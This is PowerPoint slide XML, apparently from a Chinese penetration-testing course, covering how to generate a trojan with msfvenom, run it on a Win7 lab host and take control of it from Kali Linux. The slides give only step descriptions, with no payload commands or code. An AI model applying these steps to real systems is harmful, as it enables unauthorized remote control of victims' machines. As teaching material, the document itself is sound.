            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="文本框 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214620" y="765175"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.将木马文件“shell.ext”复制到Win7系统，并双击运行文件，如图2-4-58所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214620" y="1410335"/>
            <a:ext cx="5276850" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="文本框 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214620" y="5601335"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-58 在Win7系统运行木马文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马的方法</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="文本框 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231765" y="841375"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.返回Kali Linux系统，使用“shell”命令和“ipconfig”命令对目标主机进行监听，发现已成功通过木马文件获取到目标主机的操作权限，如图2-4-59所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231765" y="2040255"/>
            <a:ext cx="5276850" cy="3638550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="文本框 148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231765" y="5678805"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-59 获取目标主机权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1856740" y="2546985"/>
            <a:ext cx="7691755" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.能列出msfvenom模块生成木马的原理。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用msfvenom模块生成木马并对目标主机进行监听。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
